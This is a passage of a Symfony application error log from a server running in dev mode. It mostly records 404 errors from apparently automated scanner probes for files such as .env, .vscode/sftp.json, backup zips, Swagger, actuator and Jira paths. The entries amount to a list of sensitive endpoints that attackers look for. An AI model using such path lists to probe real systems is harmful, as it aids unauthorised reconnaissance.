  7687. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7688. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7689. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7690. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7691. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7692. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7693. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7694. [2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7695. [2025-12-20 18:39:17] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7696. [2025-12-20 18:39:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7697. [2025-12-20 18:39:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7698. [2025-12-20 18:39:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7699. [2025-12-20 18:39:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7700. [2025-12-20 18:39:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7701. [2025-12-20 18:39:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7702. [2025-12-20 18:39:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7703. [2025-12-20 18:39:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7704. [2025-12-20 18:39:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7705. [2025-12-20 18:39:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7706. [2025-12-20 18:39:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7707. [2025-12-20 18:39:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7708. [2025-12-20 18:39:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7709. [2025-12-20 18:39:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7710. [2025-12-20 18:39:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7711. [2025-12-20 18:39:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7712. [2025-12-20 18:39:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7713. [2025-12-20 18:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7714. [2025-12-20 18:39:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7715. [2025-12-20 18:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7716. [2025-12-20 18:39:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7717. [2025-12-20 18:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7718. [2025-12-20 18:39:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7719. [2025-12-20 18:39:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7720. [2025-12-20 18:39:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7721. [2025-12-20 18:39:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7722. [2025-12-20 18:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7723. [2025-12-20 18:39:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7724. [2025-12-20 18:39:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7725. [2025-12-20 18:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7726. [2025-12-20 18:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7727. [2025-12-20 18:40:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7728. [2025-12-20 18:40:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7729. [2025-12-20 18:40:07] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  7730. [2025-12-20 18:43:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=request","method":"GET"} []
  7731. [2025-12-20 18:43:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7732. [2025-12-20 18:43:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
